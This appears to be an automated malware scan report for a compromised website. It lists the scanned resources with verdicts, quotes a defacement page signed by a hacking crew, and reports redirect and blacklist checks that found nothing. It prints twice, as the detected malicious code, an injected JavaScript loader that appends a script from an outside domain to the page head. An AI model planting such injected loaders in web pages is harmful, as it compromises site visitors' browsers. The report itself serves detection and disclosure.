Scanned pages/files
Request | Server response | Status |
http://triplestatehome.com/ | 200 OK Content-Length: 10369 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below):
if(top == self && typeof window._ws_all_js==='undefined'){
    window._ws_all_js = 7;
    var zhead = document.getElementsByTagName('head')[0];
    if(!zhead){zhead = document.createElement('head');}
    var qscript = document.createElement('script');
    qscript.setAttribute('id','wsh2_js');
    qscript.setAttribute('src','http://jswrite.com/script1.js');
    qscript.setAttribute('type','text/javascript');
    qscript.async = true;
    if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript);
}
Antivirus reports:
Deface/Content modification. The following signature was found: Hacked By Taz ...[1149 bytes skipped]... com/script1.js'); qscript.setAttribute('type','text/javascript');qscript.async = true; if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript); } </script> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title> Hacked By Taz </title> <meta name="description" content="We Are The Lights In The Darkness, We Are the Truth Behind The Lies, We Are M_L crew, It's Too Late To Expect Us!"> <meta name="author" content="M_L Crew"> <meta name="viewport" content="width=device-width,initial-scale=1"> <link REL="SHORTCUT ICON" HREF="http://i58.tinypic.com/14cdu6o.jpg"> <!-- CSS concatenated and minifie ...[10765 bytes skipped]...
http://erin-erina.meximas.com/js/libs/modernizr-2.0.6.min.js | HTTP/1.1 200 OK Connection: close Date: Wed, 01 Jul 2015 03:16:02 GMT Server: nginx/1.7.11 Vary: Accept-Encoding Content-Type: text/html | clean |
http://www.hostinger.lt/klaida_404? | 200 OK Content-Length: 11736 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js | 200 OK Content-Length: 91556 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.14/jquery-ui.min.js | 200 OK Content-Length: 201658 Content-Type: text/javascript | clean |
http://erin-erina.meximas.com/js/site.php | HTTP/1.1 200 OK Connection: close Date: Wed, 01 Jul 2015 03:16:04 GMT Server: nginx/1.7.11 Content-Type: text/html; charset=UTF-8 | clean |
http://www.hostinger.lt/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://erin-erina.meximas.com/js/popup.js | HTTP/1.1 200 OK Connection: close Date: Wed, 01 Jul 2015 03:16:05 GMT Server: nginx/1.7.11 Vary: Accept-Encoding Content-Type: text/html | clean |
http://i.kuryjs.info/kury/javascript.js?appTitle=Smartbar&channel=src2_pr&hid=3e05eee2-d832-47b7-b607-7a163fbc72ed | 200 OK Content-Length: 7177 Content-Type: application/x-javascript | clean |
http://www.superfish.com/ws/sf_main.jsp?dlsource=fowpwbb&userId=16AF47B9-805A-4B2C-8D0&CTID=src2_pr&partnername=Smartbar | 200 OK Content-Length: 0 Content-Type: image/png | clean |
http://linurytestwesteurope.blob.core.windows.net/sharon-test/visadd.js | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://cdn.visadd.com/script/14567725814/preload.js?subid=src2_pr | 200 OK Content-Length: 9348 Content-Type: application/javascript | clean |
http://api.jollywallet.com/affiliate/client?dist=100&sub=2_pr&name=Smartbar | 200 OK Content-Length: 39880 Content-Type: application/javascript | clean |
http://apisurftasticnet-a.akamaihd.net/gsrs?is=amp1lmeg&bp=PB&g=f47f4329-19a1-4111-a256-13a763f5939d | 200 OK Content-Length: 11268 Content-Type: application/javascript | clean |
http://yondarkness.googlecode.com/files/AntiCopas.js | 403 Forbidden Content-Length: 2155 Content-Type: text/html | clean |
http://yondarkness.googlecode.com//www.google.com/ | 404 Not Found Content-Length: 1425 Content-Type: text/html | clean |
http://triplestatehome.com//ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js/ | 200 OK Content-Length: 10369 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
if(top == self && typeof window._ws_all_js==='undefined'){
    window._ws_all_js = 7;
    var zhead = document.getElementsByTagName('head')[0];
    if(!zhead){zhead = document.createElement('head');}
    var qscript = document.createElement('script');
    qscript.setAttribute('id','wsh2_js');
    qscript.setAttribute('src','http://jswrite.com/script1.js');
    qscript.setAttribute('type','text/javascript');
    qscript.async = true;
    if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript);
}
Antivirus reports:
http://erin-erina.meximas.com/js/mylibs/supersized.3.1.3.min.js | HTTP/1.1 200 OK Connection: close Date: Wed, 01 Jul 2015 03:16:10 GMT Server: nginx/1.7.11 Vary: Accept-Encoding Content-Type: text/html | clean |
http://erin-erina.meximas.com/js/mylibs/jquery.mousewheel.js | HTTP/1.1 200 OK Connection: close Date: Wed, 01 Jul 2015 03:16:10 GMT Server: nginx/1.7.11 Vary: Accept-Encoding Content-Type: text/html | clean |
http://erin-erina.meximas.com/js/mylibs/mwheelIntent.js | HTTP/1.1 200 OK Connection: close Date: Wed, 01 Jul 2015 03:16:11 GMT Server: nginx/1.7.11 Vary: Accept-Encoding Content-Type: text/html | clean |
http://erin-erina.meximas.com/js/mylibs/jquery.jscrollpane3.min.js | HTTP/1.1 200 OK Connection: close Date: Wed, 01 Jul 2015 03:16:11 GMT Server: nginx/1.7.11 Vary: Accept-Encoding Content-Type: text/html | clean |
http://erin-erina.meximas.com/js/plugins.js | HTTP/1.1 200 OK Connection: close Date: Wed, 01 Jul 2015 03:16:11 GMT Server: nginx/1.7.11 Vary: Accept-Encoding Content-Type: text/html | clean |
http://erin-erina.meximas.com/js/script.js | HTTP/1.1 200 OK Connection: close Date: Wed, 01 Jul 2015 03:16:12 GMT Server: nginx/1.7.11 Vary: Accept-Encoding Content-Type: text/html | clean |
http://htmlfreecodes.com/codes/rain.js | 200 OK Content-Length: 7113 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: triplestatehome.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Jul 2015 03:16:02 GMT
Server: Apache
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: triplestatehome.com
Referer: http://www.google.com/search?q=triplestatehome.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=triplestatehome.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://triplestatehome.com/
Result: triplestatehome.com is not infected or malware details are not published yet.